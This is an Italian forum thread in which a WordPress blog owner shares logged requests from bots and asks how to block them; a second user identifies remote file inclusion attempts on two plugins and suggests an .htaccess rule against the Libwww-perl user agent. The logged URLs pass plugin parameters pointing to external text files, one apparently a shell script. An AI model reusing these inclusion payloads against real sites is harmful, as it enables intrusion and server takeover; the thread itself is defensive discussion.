Navigazione

    Privacy - Termini e condizioni
    © 2020 Search On Media Group S.r.l.
    • Registrati
    • Accedi
    • CATEGORIES
    • Discussioni
    • Non letti
    • Recenti
    • Hashtags
    • Popolare
    • Utenti
    • Stream
    • Interest
    • Categories
    1. Home
    2. Categorie
    3. Coding e Sistemistica
    4. CMS & Piattaforme Self-Hosted
    5. Spam tramite il mio blog
    Questa discussione è stata cancellata. Solo gli utenti con diritti di gestione possono vederla.
    • V
      valent User Attivo • ultima modifica di

      Spam tramite il mio blog

      Ho analizzato i dettagli dei visitatori del mio blog e ho trovato che qualcuno ( o qualcosa) ha provato a inserire queste e altre cose:
      http://www.mioblog.it/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://yscfortworth.org/calendar/jester/sei/un/figo.txt?

      Il browser adoperato è Libwww-perl 5.800 e l'Ip 64.72.112.144.

      http://www.mioblog.it/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://yscfortworth.org/calendar/jester/sei/un/figo.txt?

      Il browser adoperato è Libwww-perl 5.805 e l'Ip 209.59.129.102
      Penso che qualcuno volesse promuovere quel txt.

      E' capitato anche a voi?

      0 Miglior Risposta Ringrazia Cita Rispondi

        1 Risposta Ultima Risposta
      • G
        gh3 Super User • ultima modifica di

        potrebbero essere anche dei tentativi di injection su vulnerabilità dei 2 plugin..

        0 Miglior Risposta Ringrazia Cita Rispondi

          1 Risposta Ultima Risposta
        • V
          valent User Attivo • ultima modifica di

          Quale istruzione devo inserire nel .htaccess per non far visitare il sito da parte dei vari Libwww-perl ?

          0 Miglior Risposta Ringrazia Cita Rispondi

            1 Risposta Ultima Risposta
          • G
            gh3 Super User • ultima modifica di

            Posso consigliarti questa discussione.

            Si parlava di come bloccare la maggior parte degli spambot in circolazione...

            0 Miglior Risposta Ringrazia Cita Rispondi

              1 Risposta Ultima Risposta
            • V
              valent User Attivo • ultima modifica di

              Ti ringrazio, ma uso già la lista che mi hai consigliato, ma evidentemente non protegge da queste SQL Inj.
              Mi servirebbe qualcosa tipo:
              RewriteCond %{HTTP_USER_AGENT} Libwww-perl

              0 Miglior Risposta Ringrazia Cita Rispondi

                1 Risposta Ultima Risposta
              • G
                gh3 Super User • ultima modifica di

                credo che un:

                RewriteCond %{HTTP_USER_AGENT} ^Libwww-perl

                dovrebbe andare

                0 Miglior Risposta Ringrazia Cita Rispondi

                  1 Risposta Ultima Risposta
                • V
                  valent User Attivo • ultima modifica di

                  Provo e riferisco.

                  0 Miglior Risposta Ringrazia Cita Rispondi

                    1 Risposta Ultima Risposta
                  • V
                    valent User Attivo • ultima modifica di

                    Ecco quello che volevano fare sul mio sito:
                    htp://usuarios.arnet.com.ar/larry123/safe.txt
                    h
                    tp://www.freewebtown.com/shellku/a.txt

                    0 Miglior Risposta Ringrazia Cita Rispondi

                      1 Risposta Ultima Risposta
                    • G
                      gh3 Super User • ultima modifica di

                      visti così sembrano hacking attempt, sopratutto il secondo dove si cerca di visualizzare i contenuti del tuo db.

                      io farei presente la cosa all'hosting e eventualmente alla polizia postale se hai l'ip di chi ha effettuato quella richiesta di dati.

                      su come notificare operativamente, ti consiglio di chiedere lumi nella sezione sicurezza del forum, penso che qualcuno ahimè ci sarà già passato 😞

                      0 Miglior Risposta Ringrazia Cita Rispondi

                        1 Risposta Ultima Risposta
                      • G
                        gh3 Super User • ultima modifica di

                        Buono dato che viene aggiornato con buona cadenza dal team, e i riferimenti sui siti di sicurezza o hacker dove si parla di falle non sono moltissimi ( rispetto ad altri script con un medesimo blasone )

                        0 Miglior Risposta Ringrazia Cita Rispondi

                          1 Risposta Ultima Risposta
                        Caricamento altri post
                        Rispondi
                        • Topic risposta
                        Effettua l'accesso per rispondere
                        • Da Vecchi a Nuovi
                        • Da Nuovi a Vecchi
                        • Più Voti